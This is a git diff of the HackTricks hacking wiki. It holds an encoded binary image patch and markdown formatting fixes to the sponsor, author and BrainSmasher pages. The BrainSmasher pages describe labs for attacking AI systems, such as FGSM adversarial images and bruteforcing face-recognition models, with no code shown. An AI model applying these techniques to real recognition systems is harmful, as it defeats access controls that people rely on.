zY9A@tyZLnU|K+!v|HSj&2Hbu#V*_n`xnm_K@-DIz6itGV{{Rk;mF&|Qtlhnip~Vp@
z8lJL#*E*^is#vftD%q6h%R4M$FQ#ZBgWiyvp!86{%!9IA5{@3=(aU-)Vg?yWKxhz*
zutY!$xLH`7B<Ji&_9XA4roJAN(}mUN!x0SN2>G%4otV59TKbx~oOglr6KNdGNakk#
zO<oW5Yl0zB&Eip{;-)d*(=;YdFyaK`Lk3>|lj<J(n-^dI;XUvn%gS2>LrhVeJgR=c
zZ`Xdr*9F%Yx0wk>tQQpijzDk)j>3Ly9tT#po$_Z-S+!|3g{4J`U^oI2GSjU}L1__*
zNjoU1dPGy#OSbGw;LP<4Oq*vTj-NKXSZVEg#^-DP$jyTDEI7uwTXu{8{ipwr_4_uk
zX4iT)CneB1*2hxNjx{V`%tdk4LlRPVQ_)nzq;-~zGsjr9Z7ro$WwiEm(DbU6`t~N8
zyV_{$>0n@V7>Cyt@rDpECh%Tbqg$upmTU{LvN1N*N$Sy^oIHP&8LQMcpfnNUWWILS
zMoMbR)Qq#3flMw<lXLB?s>9IyIF7JKk&5%VSJ;z&fS!o~>bqLllAK6+ePtv|fDfnN
ztxTZA=~_AXhP>E3qB&Tgqo;#QH?Oc}^BSH$uViF$lrtC4@bRY~lXovqk&*7#J#_YT
z(B9pl&Yzqe$L6+RcA1!59H;43JvWN3k$(CxyASUo^>_-kFP~xaS#gKmOe{=L`?8+g
z2Y1N6aEe1GGdO%Ilj6!pjGJbdUFzdt)^0W*+E1TpmcjX94rC;de(@mv3j^4dgS13A
zTB517g3s6gft$sbu>~#EG}rLwm4Bw7^sX9fi3R2kTc~L%<&(Alhk~*q?BNj4+uB&a
zYbW_74=_6%_(CCk0dXb|AUQ&WWCR0VOy)UUE(ufXrK7WnJ^Qv&^dMI`<BJAEX5Za@
zn=&o>_=}Ht(OFN=^Z+Xo){uTK6H`z$7hXkBg``%#e8Jj18@W?az?^%Iys}*Wy6IEC
z+V%xsZ2pX-tOLqiYRNq(o(#CKQ`h;7-+%cV%IZs*w2gBv_cR;!tl>dbA(c%}sA;R>
z#jEGkv{&(>y_(^<*Vz3Q7Ob<3P7X0THOlbh2*XpO3`&_C=Jn(dor7IWnx~a7NKNxo
zQjhK9`1uS<Dhp`rs;0K%Df>_E;g_ralZy6grTOdWsO77~m7L7Ih$$rGL_$PMv@5qF
z7^`=zVR&hb$F+~xuzS7Iyv<t|mP6T!yh)@fNzmsGc$Nu<+i&GT*<H40?5C`)UYSS<
z^;mvCLVg@}6E9mEIDR6X%<Oa;TAMIC9XJ93MJ}A-AX02WxAGaW1T4(irkPk6<6%V!
zX&Gret*lTXbPaM5_rZt*$M5rl8YdWWIr%<v5<lmkFDE}7Qpc}|?ST(jhTkF>0=K<%
z4z~08jxX7folO7S6#lSIfF?7X5*|}vu-)sRrL&c~)&?wYE0wiXtk|%UdqOZg790U5
zuCQB`g3>~^A4uT-(}%S7b+CTdW-jJlRe)U*aoK|woFNmf-Ou>Ts^4>`<f_tO<d$6F
z*MIqUt`uG6VQm>3_HX6*)iX>v7nJrwLf0Au<7v|~X6y?bzw|ZR4kYqws88ue1aLV+
z9;|*BR<8q_$EkcrbX$aA2))oGL%@@4iHV7xTedSg)yct(1dg9Q%%o{T*_1niPM$VY
z@!94TN`oS^&N6pAWtmmaPdk;)$l@fHpc6~b!HdpDwj?F;@YxgYlohk%&|Y3o4=XSz
z8lK*f*YpkbVRcxPMnmc*ee4Q*F}o~`PLGj#G>xmbuhR9pn==>BD(!`k4~Y`w3wf3K
zlq~%rAAzvwj=YFtu}|q&9GG15Oq(Zo)>2JMRx+D*uV;8>NX_QE@!$x#)GYJJ!Z^*n
zZDgH0!M=<X${VYhUg#n9m=KJ;bT3TOIo8eIBU{P3no9rTpwcLbR>0#k(a`dQKdtx=
zavxm7>Niu<{ESal{e`;^3-BsRB~P<b-BiL~*Z*2+FdX3!gY&Z_q$G3X)G0=$XK?ug
zc!Ls3Sckmz2YmPgURv84X=<%!!8A)tTLU}yZKLo(E+*ToayIq_op=IH3QE)&B~JhV
z8;D6nK~(PW@mGJQ>SZmR<F8q@YZKYm&Z@c!p)rU3n8IG3ysTs8p3UTy-($|RK;Gj#
zK3)F_*9xyv*;v8;jJ;%E%wk}=4|~Xh2PX}$UhvV1-%;N1m^t?}*;lgIuy-wO1I;XY
z=UDPDu;^c4LDs$E6fZd;oIG!=;^2`a689#sWB(2k_9wD^|8^4gC#Z5DJ&EG-`z$)=
zIeq0gyHdB&*4N0AX9jzCfqC~NM=z)Ie^&p7y4OuOgJ#-ZR<mlyO1{p$ggN9ve4-?J
zmdj@)^Xo&b+OdYAg%O_Ama=vK7M|8UWzjAg3>D}Wm)Fgb#e~Ub!sU1132JSWD`4fp
zlL8Xb_fh_`7F*b_w2_*OOMVj%ZEcNY9Xrg$i>H<8*UaK9cApDZD4@*jEMB)tkk~oc
z%Yxgaf&*wrZx5|qEgU_5R0Uv=5Xf<Y@y`bWAJPxmk3leuTt6Ru^bx=K#V@F+sEBKj
zzNZH1Lz0zvUH`e?EwNxZzW&2|;6s+*7=j@}D6#hg3V>WKy38k={z~?hGYn15D-#aM
zqAl=n(YZ+3voey7CUN8LbzC7Aug3>CeEcxS&SWz-FQ!idZQaTb;mE0@9L!2#U}~7r
z`EfFGGD%F{N#m;~r8jT{Z7e!xIDI9HO*_A$rRzC!woxwSf6X7i{4Xk-D;P0N@U-O_
ziHG)*`?yfqstdumU-gJ>2X|7@Sk0_`fuf2B{N~d?@UXg!IoqO|(-!B{p78-5RhRQ>
zpa+NFjVtKE<S=9R*i}A+pd{Rj$?`2mOW<H+x{IWY1dg3cW85^R+T;v56mb4@{bv+B
zy|1(>5{Pu(xkS$Oa~#M@Vcax@$!k>_jG_54vM+tj*5n<m+q0Q-xtCdVnIk4-UTW%}
zu_tLa61sNDvWQ!NqIy1<ofaBiHnJgMBX=L%Q<0=Zld)sp4vI>OR0JxCI3<4)9#^6i
zjZcm#lF`!MNKJhuvr7|dG<-PmgdJSTy~ygVD|tQHPfJe=k7^z>IzNipYf*G$$~s43
z`F*w@+(}jQGbU%dNXy>C_RJ)@7baK=SU7j%7#sJ0MQv{b4wa7r?5-v9?p<NU=1-_@
zs#N6ic}pFity@8HS&0I*LNbJ4R5jk`iw(a~1j7>avFLS?U;2>GH?HG~<Xsu)XTfU0
z;T4@x7?aIHY58MTZdj=z70sCDcs=r(<EM|QXhglkU5ZqR8Pe?1G)GSzW$n&QbckPr
z(?sT#vwV@bk-qs!Y~e8TK{w+rGbe6e;lDSpqO!f71)qsKkMFQz`wE`7J;&@bQPWb*
zzKp%(m*z5Q9>?l8(c0I<U)O)a)24D3eG3#+++oGG&$(W78B0h5Y4J<xpXudZc|P5v
z9m+gvW@&=fS4}ju)>GeFPhD#rjqMGzb+^*l-;T6FOsR&ZUz2&}FiDxa8Jg?I8Ma^z
z&C)&5%9hlP{A$(jl!=sGnWR;-YTFlVI<S?#*)f*fRy<)hy~D5g&7Xfo+Ns0LIOb@4
z^^Bb<iJZQAhJlGeWez1Fqa~Db{=IxUdfL?6E&V4!4jeu+MP&sf9Z#jQ?FHtb9h={w
z+TjnmnVK0TBQurTdDj>k=_e?OC;_)*0T21G`rXXhOx!BI!^*8|Xzgpm>^0*GJF$7K
zJa2l=o}@kG-Oa~rF>4=;xQSF8;C@el`#uE2_@P#UDmv>(LeV(E_~!ypV_f3Pf6Z|)
z-naPj{d(X-elOl27>0R*C*WmrVVpBJa#)$LiXBIixKmNYqxvV5HB@l%?iIGBBy#dv
z4o$r+YF2;AV^*`T;>;~J{Sqlj2t>i7d!%I_;@;yTO*p(_HuIc>q#c~OagL_0CffU7
za=Yj{E4TcG%egsBEDU1t&T^~h5}&O8n8xl#OaUu1js<R)7O?Bc0ZQwhGUql^QuCO^
zv^`WdKT|XCT_e5h%SdML;Uw}O7E;&NNKJDc=Wbpm{bVNHL%q1eUQ7-P56dNA$6aO@
zXYotsWks-bg0qkU_%0Q>M;x3_Tt3Q_RU!mQl0Q4OZFQ{NzM2O$rC34|H^|4l+r*{(
zt0ZToGPXFWOs5u{OIQL9?pKxayU#!3vyCed{|(U?2niG4jgjdw(zDaqwsR}jZ(pOb
zwpyEZwKXCUw^A}vIhK=6dyfEBzjF8%=kJum2Pvy~OiNpniaK@lSUOqR84M1;Rs^HD
zt${;F4|40yReA<GdHJf5$C7{Gz;@EIQW%>ZrnS3?v|}k;$-PW_U%MJNaY)a(a+=JX
zOu7a;n3?Y*{p)1*oJ^(9G^w1o8#^jU%Gg56$z&eXmQ&eUugv2T_iyLe`7A^e;s|-E
zec8;H8`tru=BYBv5sj7j+f>&Vv0~$Y@!;uwEPf9T$>KdRM*hPGtlqwb)U2b5XjC`U
zQPWVzmE0TbNZP~6i)ZK?AHoszD2-HAeGPjL?IZs|9!;+rY42_4*1g-T-?54OM@7uK
zB_Ke6vc~7E+O>_0i#a^+YNO^=E4QCKVE3`ZWM4neh-F$4jC)TD*_OPG=k3oF6`FI*
za;@kZ2eS53Qgfdf+cfP1FZpuwU#V`bRI~D3<DFz)Naw3<pHW<0NJDQu6-`e#apf4h
z4<*vt*QkKGcsYn%NlpwY+Dl1mn?&QJ{8%D7rK<%ONJ!bt_2Mfu_0>|@QcB+As~kF;
z!f#f8#QA$y7@QrTxxI#!>px|~j&<CAP(XEat&+_X7qj_d(`QsRRjX)TCf77K3a+y!
zZ7+HE?^0G%PIX-k>Dd`7T=c-`Yg_>b<8!0bzkH_3v9noh+P{Ufw=eL#t(KR)Z7kUr
zShUTNdGauyeEu<ccW+SN^o*CUnt9p%k{2y?Ja4IIbZ!ER*GYM8CEE`qlJWIXmHVQl
zyP1NA1!SDaAU!Lc?!F$Ch*6yR4K2op{Dm5?`%eRs{w{(Mj+n#72}YdIeosOhf3M&F
zy?#Gf9ly%xfe%^s-Xa*1{W?rYV$l;~(K<s>#T}BqPGV!~7XF&>CF>4sCh1fv59`Y4
zn;m2^Xw_M^!ye^>@UXI!1BVZ=J9Q7cQg@S_c~Fsz@x@83eus)EGi93LQOy&QGgH`m
zcps_9Qb@@XZOA2FPjunNs?0y`mEPv_wV&var(u@@>JyeZPF_93?(`&{cQkOfte9=d
zJE&-=R{jyzfP?1lm)y9Q$Bu)0*s?E?J%<jEbLAX0O)pfg41sqRmpH+mU{}&^#-_#;
z!3cx{NKsjpRje#G<8u;0X%}a1oM75Ei3^t^7)@P`Dk@KT{ZnNIC3gJ_9y2$JZj+Lg
zhO}3*1K0yj)#lEjZa!J_8M}|{XVN^QjtRZ+hCQlIbLKg&=U(T?(L=1=vX)hw*060)
z0tb&A<n+ZeydE9ECB7PAG5QLrBzISDULj%Ec6RJZWPkErj-AM)uKoo!yG3Pto?DtB
z|K2UWKAX*v%v92|QrUYTk>fc>=^cE9H{`(XHS_XS6UTEhNjiLheW`m%PEX>*+2cH^
zd5qaH%Ytc?th0wXkaLJ3`wUizz~q~uxwVXw7t`5%FoBI}Nu->}<owOcwDfl12>V!Y
z+Npcl#>&l`d0JbGWK$9IEq~a?^ZNU&-t-$DRhM873A6@lFu<I{PIYqw$Ij%iZpU`E
z?Ay(@{d+iaDw~q(3WjDUnX#D>e*l>&xA|S%eOSm*r4`$uh-*?t3UwV#49<+{^9V8L
zw(_jKk%K3WvM=ipo0E5Q_{<5e7K?ND5|*%&CBKED%3_j^9iXPI8fVz0$W+fn7hhjL
z#@?el=^W{#W2l|aH+;&o7KsdIW68I`z-%99Z|9JhwvDyBR<dfxm+U%}Kvh#Y7N3|T
zi6%x9izvy^q(WM+i;yoV9^{!>monINU_A*bTR3&~D34wg(ly>r@~JdZa*pt@<{?jC
zl#-E^Ov$4{?%Xe6PkIt-c5PsL$`0~N?_l-Wm4;DrRZJ|5lUJP2!K10H-nx!8Ti20u
z@eHl6UaG`>Cg&3Q_iwXl$67vF@h8@7U&B{hR`Q3>{>aKLE7*T%KZ6sm8J!+vXVP~5
zvf>j~Z(PaxEvs3*X(em6u3`1oHLTjYnrF?mcnLCXo}=VxsnVRRO<2pSEvs0cu%7Ik
z<FvH3sN5zhYk4GV{D=Hy8n65NgODHEcYhDTkY~xCEX7PJuEF@}#_flWbNu`de{2k(
z9ACa)4}8e)z*__(tO!O}e4JH;8Sw>hG3%b>)kHh(qwTyJ?`B|bIN~hpQRG6Ld}Rh-
z%#LhcJ42JhbPe{<J={<K#31&7_+ogK=D=8r7Gch|z~JN{y~Dj~=G5*p;||$W@q}$m
zEsWCM(~8w&(f%A_x)Ju#J26Q2=xa=FD^p9ebPe^Y(757jq3`cw$!TR^a+L1j*J?Rq
zUcm16;0_6_58@7Z85$pDczi_pFKFKdzs|TVrcx@&okxYyoi<G{YZZ-z4e_>chn%<q
zb_ON~Sag}NhlO@XNKOw+ZnH82a|T^Fd=BMAEs4|0o|UtH=O!u}s+HrrBpeek=?Q6b
zEoacJvUtzUPb(*22}?UPKFsvOG)t18(C1S5GJHX=a?16G0xF~W^xO>NQ)5icOk%TJ
z35YYaWL6Ia@CAL?oE8;AbYy%;WxO67>1TR=Lis5OsP%?i3iR8YW@Hw-XP}GMBmIm`
zkKypz@P-{Yy^HisbkRQE&3sUzK#6aM6`O5b`KYwMZlrnawer`Qwuy<5NBN|<!$FoD
zc3yUMF}t*=%;B`@nG>^Zgto3H$_ZTp0=rcVD3o)sE#PC;W}$Cll$O43ItKcgG%sNB
zi;H+bWhjvtUpm*i81w|O`(*ZgoSxxcB@<qinL)#PasAfr-#*3{rfDDSp>JY{@ugYj
zoMx;cry4_R$idj+7@fnNh(ofpQnXAG4QphfkG6qE7TmKec^2pxXi>Q|#PQo5mQ2<T
zEdE8t76y1d)lKhs2cz?Y%D+gz9r|vXWJv9F4aKuT#zD4~JSYu@M@6`rbI;N_(oXMq
z7Zau-%$`|gF7<l)HLs_Kl*Z2DGcz_lh}krU$uv**<d8B8dp$d%j_YvJLTNmT%zA=u
z6-8=%c7nc<*D8>JCoIpFGd#@O=9IZsTXzfXy)S9)ZdIkDuZ_NuKAe6#4xg3Y;cnV`
zUh=BHlg|EEboO`B(cejXU#H5gBECc7-{cCqF*!_XZ2E@#kTO0yu99v_g2_Ng3>bq7
z=zYjvr184{v_L3MFn-$pj>~tvzu#8|-VavCuQGbzef$0AaNRcuhBlL04n(PDT_x&|
z04V_=GApk@yaHbWN_@B_0bJOpA|c5PyMPKuKq5$aRMF5%JBJIDGPdPfeZ2sGx3V4g
zikC-N(sOCh<qgRh0>Ly`lyIIpt(QDgyA6B7J_IC5k>`8GAvNUJVK;?Lg#9XChve)q
ziZ2|%<@ez7xe?I5Ofb|{I=YmYt*AU5iaLmKlz5;B>Cm<D1cg@UUJ-Jk_X?46WAoXN
z5U`^&qdaeZL1s=C+2>C%W0gD;`Whh@qQQ_PdP2@5iC!S+Rok+ziX<!ZyYUCT3XF-5
zOspxFT8~8cQAq+Ne?&;m5t89k?NZUHL~{`I;0qZu=^Ef_(;U$%=m<i3M5HBpCS8qI
z*nvQMab~xKb>cLE`C-KKM8LIOMa;5?gUTO6avw;~h)f9h7tMtZ1T2~{@okZ7t)hof
zcK<pss*w{~;y^`<BP>z7{Hn-#64q7cj+VR(I{BMCLp$wj$7PWhA#mDRUZ1DW)$1D4
zYtkVtkoxKti;PBLzLq<YcNsB}e@!HWJ_%`%?A7AeBCVBvl5<>Pt8(fV(&5IT!Z6GE
z(S9}hR+9`vb77cF$$9b-X_N53a&07=gwSjC9BEthJ<?hcZGI)8ql4=GaN<W|rHN6N
zM2gZqBj#DsE3z$5l#hN-WGOAzL?<H2O3r1UeugY#kITK}4)Xr#>-AB&kKA9LWZY5C
z5Lq{l>6!`!i4^hU35Oyj{$u`g_;L6-*C9?Y;_t}MSw7=+i^`_~l;g|y>wynhmcEl<
z1cM<0;+r54OhuOw7!kxTG4qWgKq4H#CxAYzivsu&(jh=d0G&1l@h_7RO&|1r1>^)|
z2eb*0K@z+n0VM%k0Uz#=TpLiuB_Lc#MKBUtGpwPHPqY)N_>m-H-e3T)EJGUXNS*b5
zeO%TBd`bO{y2~Efr$2IEuQG`e$S1(h&^!nb6mTdIO0)n5FqCtg0VhtsgYnrhF5kLD
z#>sTD&m5<&y+Hw4=|v$aLNHX3c1Wgf0dmrZ5et1;Q(Iy24>5`+51MF1*F|F?W^I~S
z2)XcULZa@b;kAw~6&(>78Dn&OLNJtOLO`Gahy@<%c1qpE49q43G6FaS)cOPjhitgQ
zLNdHK!hS_I6ctm1Px?>*t?toimUKHoBoB!6s0RCTp0O@V0mxFMm$kMcta3(3-U!_y
z*>4m*aw4A^?21%reSy|s$hwB%GH0%fexA`<eVqZ{^>`>?tZB6(69zrjgh6`39w8bc
zA3_ME2qDwt!XTh>zO2jLqaO|ArH}RfG`Y|OMr$!-zkW-Eb{XrsExNCC4GrobfL&Uy
ziIeUd=@X;>b(A!1A|mn9l>DoH(S$>KJ1Q4)C*x`(!-hOblTUd!bP*|)zLk6EeX_^6
z+Bl|1NdC*2n&gO72<?=mqV<YsM1Pz<<S*BF-T!gp7$+G2xW0|cZM<)POc{7TSRKF0
z=z$+|EPm>HeLKMjK}Z#uS@aQ705?b=EOzup2_p&7#9Sw~C=f5eJ{-U!<U@dCWL>u3
zE<yn08ed2VfG*z1(jN|~Bw$|2BpfL!DVQQS;xi$2(j{64$)E5yN+^aTsU%|pdj$Br
z`O!cr3J(R&X%OWhAW6xBF8o26FBb5qwJ#bJdRQ>c@VMe3MWuyw4|cQUG%5IH09k!k
zugadR=XT|3Z+(`Dg(euGkR%2)$cA1DDKU!5fglOcmamg_UHmG1ttJcxko1KGifT|P
z_0i-)fU^O+b<H%@&_qB3egTvkBx(RG?Uy?VxYZC^_mys~29?scA`S9PDH?)mV5+xd
zk1hsr&?G>>v{AIHw3z)!(e*Hv#`VT1>U&4;Wsr<--oxm3sjr@Q*R<8xuX{l2&vcs%
zAg=pLS}n9n7g^VY!XOp~^p;-Hch+nAS#ngLX`HW@hAbHrEJ_HpX_(gL$+dDf-Mi5{
z%9EnxA`0fUhE5>8(TDn4qxWPa4Wc0H(rdcNe%(I?*)gt>ev&#!O>}LHBYLTi%6~n=
z#t3QRY5Z3NDDHR}cfS1_G7u*iaS;4dgQfWM-cRNXpd4SmUk`l9a`&ACLww;Rbgd>B
zGAkY=5F)0$O)w<Mm(~(!!k~$RXbue1B&|`9jKOafO)Nq>!I~slQzeW)tcx!k#up(Q
z%i5C|av>z++et+Te^5%yIp33D2xO9vKxPdQ^_GCBVAw-2=pi7cO%Y%vW*`E_1pav?
z7l=plR0tT;9}Tbs_8RvSz$SZjG2pCTYVDAAJdbKCzM;K{IHwz$B&BtV5R8B%?-OF7
zoU64dl$b+FQFRVQ*EP`)V(~V?kd_OqjDma()D40m?U5QAF!UR(SZ=?j1Nzw-Xv($v
zBhWLtrGatup0Py20LE_;3<J6v_b^DuH<z*3>w8EIbSrdS^wW)+>G}3(4K&Qx_17b(
zB_v7;qCi^{G%ZECUt-5vKh=;ieHTO4q{lURi}toA1)_P-^){%0P()1yVrwNWH|j1+
z?OPPl6&N}LMKX-OH+o&k%`zE?B^X988&8Y&nr@vT*CNj%4@SSrdB&Emi$N-4P5vZQ
z^oRU~8n65Nfsh~CZ*hY0)AaKX9hdm|@o{-u2Hp==$FDMa;O+kWkhZ@k!SE9j+ka)>
z55bTwfl!!0NX)2&cnElp0C`!DEn=Fa%#)%T3PV#7T?(lPzft^h|A@9^IoV%0q_ifY
zIZ;JDU+NGd5DdPfgb4(V5<@bi&W4#+L>poN(<rPIaAbgg0Z#IfZTYXY0-=x>DWWA1
zFldmAWfx@8{wV0`!>7*C+rhBDhrZXhkqfP5F*Gy+#H63~I7F6jlPu9DN%m{yt6^w1
ze2DhqT}8-`K{gEigQ309GxSEg1s)m%LNDKjudz@zx*lDNf?WZc(qGXYmt)39pQquc
zT>Umd5O5tW(YqSw#Xiy47rTsJYuqP#598Wp@EbAh`sTKArmnS?3QfawKgQ1RM?tv0
zD$-IJBh~6RiHAsr^v#<smviMK+J`8?FhIP9{qMdaw(eSYAt4N+AL$R{KB^}aIh8#|
zz26>rV_WKIv_aY==j%5l+5+8HeV%c?ZiP{=*!(k^V2Ce9{D(T;2j4COaf0#feG`|P
zc;Eb-WWWH*@#XvVz|Uzce`sC42f>gZd!2;tZGsUDg$ag2F(rn07zE(0rPd+{&=0>=
zBILv%DYA?q7@|3mXDK4FY@!t<J3@K_;xqD%BIH7jNs(t7Bq)}sM9r)W(DNp6iozxV
zP8vwPNif1;FH#J`VXTLPK0*>HM@*Z-;wK?9w9=muzYoJCD&oIlm^$f@xzT#Xl8iS9
z##@9#$VDJRFvQ6_dcUY9!_a6bt%hh<-eEdrkPGom(U4K<YnYXV)VcwAqkZ;mYZ`<a
zefs^DZ{ADpU_kD-2|{#6{>^J-EB3l?yZ-yP<D2)7?h&~#V7{U2F#z?OPcQ(r;h-<I
zG(K_%`N%%QJ=<6}d=zA9v`f=~Xx~KZ6IqK%9;wMiP$iVqnn|H5nrKK(Wt`QW4fDE4
zJ@nn>NwH5go~-No&114(KKi&p<%~9HUy#rn$t{h3(RGWHj34@C{y*vbIKha6=>JLb
z{vo&Z{a|(cDx(KJ<gx!Z$$RleF=h@!Vjd;sryv+HnuQoMCaodSCRti*qRC9GnU<kV
z5wi1c4Tg}8Z_{81$#@gQM**4!Mh5WHbIh7v$Uce8Bw7ef9<+~&_^C(<%QEC69P&ZP
z4?-*yxzO>HzCkdQW4CsYj}n5Ye@Uzf$#;<pIi|=(FhEEmNkyVbMg1{!ou%GJ2`KH0
zkPl5j#OzDYz-x_%)JHkMt2Vzc!HD*%0XYBmGWHt1Za`VRwG5Y+O?|$3#hcd|*T)i+
zH|Ns7?GA?CAQJJ&h<p^Y)ByTz&yMI5W5>_{(r*(CAs1T0j222wjrBK)f$WXB`||p7
z3nED)wMIZl?Yj$ztGA{yBIC<<6_T-h*SDV}$G+{jacsFJ5xt9Ui_!M)CKz#Y@ge`H
z{1kPM6O1^)_$lNp{*1q0&J3U&U%p=te8@8R{{t6>bXKn*@QVNd002ovPDHLkV1l^K
BslNaK

diff --git a/README.md b/README.md
index 6e971fdc..dddd053c 100644
--- a/README.md
+++ b/README.md
@@ -34,9 +34,9 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ****[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentestings, Red teams and training.
 
-You can check their** blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com)****
+You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com)****
 
-**STM Cyber **also support cybersecurity open source projects like HackTricks :)
+**STM Cyber** also support cybersecurity open source projects like HackTricks :)
 
 ### [**INE**](https://ine.com)
 
@@ -44,7 +44,7 @@ You can check their** blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 [**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.**
 
-**INE **also support cybersecurity open source projects like HackTricks :)
+**INE** also support cybersecurity open source projects like HackTricks :)
 
 #### **Courses and Certifications reviews**
 
@@ -56,5 +56,5 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their *
 
 ## License
 
-**Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on **[**HACK TRICKS**](https://github.com/carlospolop/hacktricks)** by Carlos Polop is licensed under the**[** Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\
+**Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\
 **If you want to use it with commercial purposes, contact me.**
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
index 67707d10..857af5c2 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
@@ -2,7 +2,7 @@
 
 ## Presentation
 
-**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I. **applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
+**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
 
 Every month a lab on various topic found in commercial A.I. applications will be posted, with **3 different difficulties** (named challenges), in order to **guide** the user in **understanding** all the mechanics behind it and practice **different** ways of **exploitation**.
 
@@ -13,20 +13,20 @@ The platform, which is now in **beta** version, will also feature in the next fu
 All the **material and the techs for the exploitation of A.I. will be posted here** in a dedicated section of hacktricks.
 
 **While** we are in **beta** version and completing the implementation of all the above described features, the subscription and all the already posted labs with their relative **challenges are free**.\
-**So start learning how to exploit A.I. for free while you can in **[**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)****\
+**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)****\
 ****ENJOY ;)
 
-_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity _
+_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_&#x20;
 
 > _Walter Miele from BrA.I.nsmasher_
 
 ## Registry Challenge
 
-In order to register in [**BrA.I.Smasher **](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
+In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
 Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse...
 
 {% hint style="info" %}
-However, if at some point you **don't know how to solve** the challenge, or **even if you solve it**, check out the official solution in [**google colab**](https://colab.research.google.com/drive/1MR8i_ATm3bn3CEqwaEnRwF0eR25yKcjn?usp=sharing).
+However, if at some point you **don't know how to solve** the challenge, or **even if you solve it**, check out the official solution in [**google colab**](https://colab.research.google.com/drive/1MR8i\_ATm3bn3CEqwaEnRwF0eR25yKcjn?usp=sharing).
 {% endhint %}
 
 I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method (FGSM) attack for images.**
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
index c6e66a06..25f2d07d 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
@@ -5,7 +5,7 @@
 The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.\<br>\
 In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles)
 
-Of course we will not provide the full code but only the core part for the exploiting of the model,** instead some exercises will be left to the user (the pentesting part)**, in order to complete the tool. We will provides also some hints, just to give an idea of what can be done.
+Of course we will not provide the full code but only the core part for the exploiting of the model, **instead some exercises will be left to the user (the pentesting part)**, in order to complete the tool. We will provides also some hints, just to give an idea of what can be done.
 
 The script can be found at [**IMAGE BRUTEFORCER**](https://colab.research.google.com/drive/1kUiWGRKr4vhqjI9Xgaqw3D5z3SeTXKmV)
 
diff --git a/about-the-author.md b/about-the-author.md
index e1c7918a..a99e76fa 100644
--- a/about-the-author.md
+++ b/about-the-author.md
@@ -2,9 +2,9 @@
 
 ### Hello!!
 
-This is** Carlos Polop**.
+This is **Carlos Polop**.
 
-First of all, I want to indicate that **I don't own this entire book**, a lot of** information was copy/pasted from other websites and that content belongs to them** (this is indicated on the pages).
+First of all, I want to indicate that **I don't own this entire book**, a lot of **information was copy/pasted from other websites and that content belongs to them** (this is indicated on the pages).
 
 I also wants to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that then I add to Hacktricks.
 
@@ -13,18 +13,18 @@ I also wants to say **thanks to all the people that share cyber-security related
 If for some weird reason you are interested in knowing about my bio here you have a summary:
 
 * I've worked in different companies as sysadmin, developer and **pentester**.
-* I'm a **Telecommunications Engineer** with a **Masters **in **Cybersecurity**
-* Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2 **and Professional Drone pilot.
-* I speak **Spanish **and **English **and little of French (some day I will improve that).
+* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity**
+* Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2** and Professional Drone pilot.
+* I speak **Spanish** and **English** and little of French (some day I will improve that).
 * I'm a **CTF player**
-* I'm very proud of this **book **and my **PEASS **(I'm talking about these peass: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite))
